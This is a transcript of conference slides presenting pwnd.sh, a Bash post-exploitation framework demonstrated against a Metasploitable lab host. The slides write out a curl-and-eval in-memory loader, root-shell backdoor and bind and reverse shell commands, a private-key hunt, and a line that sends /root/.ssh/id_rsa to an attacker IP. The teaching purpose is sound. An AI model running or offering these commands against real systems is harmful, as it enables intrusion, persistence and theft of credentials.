Successfully reported this slideshow.
Your SlideShare is downloading. ×

pwnd.sh

More Related Content

Related Books

Free with a 30 day trial from Scribd

See all

pwnd.sh

  1. 1. PWND.sh Post Exploitation Framework
  2. 2. Agenda SCENARIO: Have already compromised a Linux machine  What’s next after exploiting  Different functionalities of pwnd.sh  Q/A
  3. 3. ./about_me.py [+] Got name : Chandrapal [+] Website : chandrapal.me [+] Founder of : Hack with GitHub [+] Social Accounts : @bnchandrapal @HackwithGithub [-] Life : Traceback (most recent call last) : File “about_me.py”, line 150, in <module> TypeError: Can’t convert ‘infosec’ object to developer implicitly
  4. 4. Author Itzek Kotler (@itzikkotler) CTO & Co-founder @ SafeBreach http://ikotler.org
  5. 5. What plans in Post Exploitation Phase 3 possible things: ● Further penetrate into Network / Endpoints ● Get a firmer foothold on the Network / Endpoints ● Start Exfiltrating Data out of the Network / Endpoints
  6. 6. About the tool ● Newly released ● Easy as it is written in BASH ● Interactive and allows to create custom scripts ● License: 3-Clause BSD ● Both In-Memory and On-Disk deployment available ● Pipeline integrates pwnd.sh with other programs also
  7. 7. How can I get it ? > git clone https://github.com/SafeBreach-Labs/pwndsh.git > cd pwndsh
  8. 8. Why Bash and not Python / Perl / Ruby ? ● Same Bash for different Platforms (Mac, Linux, etc) and different architectures (x86, x64) ● It is the default shell on most systems ● There is socket programming in Bash (--enable-net-redirections) ● You cannot fallback to Bash from Python, Perl, etc but you can UPGRADE to Python, Perl, etc from Bash
  9. 9. Dependencies, or not to be Depended? ● No: – Consistent functionality across different Platforms, CPUs etc. – Smaller and simpler code base ● Yes: – Don't reinvent the wheel – Everything a Dependency in Shell Terms (ls, cat, etc) (Good coders create, Great coders reuse) PWND.SH – built with least amount of dependencies
  10. 10. Why In-memory? ● Constraints found: – Filesystem is readonly – “No space left on device” Solution: In-memory loading ● Works even if the Filesystem is mounted to be Read-only ● Multiple Versions can co-exists (in Multiple Shells) ● Disappears after Reboot
  11. 11. Let’s Start
  12. 12. Metasploitable 192.168.70.101 Ubuntu Find it It’s me 192.168.70.100 Scenario :
  13. 13. In-Memory Loading Method #1 X=`curl -fsSL "https://raw.githubusercontent.com/SafeBreac h-Labs/pwndsh/master/bin/pwnd.sh"` eval "$X"
  14. 14. What if the system is on Intranet without Internet ? What if the system is in Internet Censored country where GitHub is blocked ?
  15. 15. In-Memory Loading Method #2 ● On source computer curl -fsSL "https://raw.githubusercontent.com/SafeBreach- Labs/pwndsh/master/bin/pwnd.sh" < Ctrl+Shift+C > ● On destination computer X=”<Ctrl+V>” eval “$X”
  16. 16. On-Disk Loading Method > curl -OfsSL "https://raw.githubusercontent.com/SafeBrea ch-Labs/pwndsh/master/bin/pwnd.sh" > source pwnd.sh
  17. 17. Scanning a Host (pwnd) $ portscanner 192.168.2.132 22/tcp
  18. 18. Scanning Networks (pwnd)$ for ip in $(seq 1 254); do portscanner 192.168.0.$ip 123/udp; done
  19. 19. Local Backdoor Example (pwnd)$ install_rootshell # Remember to invoke rootshell with ‘-p’
  20. 20. Remote Backdoor Example (pwnd)$ bindshell 1234 # Connect to host at 1234/tcp for rootshell
  21. 21. Remote Backdoor Example #2 # On 192.168.2.1 run: nc –l 1234 (pwnd)$ reverseshell 192.168.2.1 1234
  22. 22. Searching for Goodies (pwnd)$ hunt_privkeys
  23. 23. Exfil Example # On attacker machine run: nc –l <port> (pwnd)$ cat /root/.ssh/id_rsa | base64 | over_socket <attacker IP> <port>
  24. 24. Plugin Support ● You can create plugins and add you to the project ● All you need is: – GitHub account – Bash knowledge – Time
  25. 25. Q&A We have HACKED WITH GITHUB
  26. 26. References ● https://github.com/SafeBreach-Labs/pwndsh ● http://www.ikotler.org/JustGotPWND.pdf ● https://www.youtube.com/watch?v=kWU-fDv2wjM
  27. 27. Thank You

×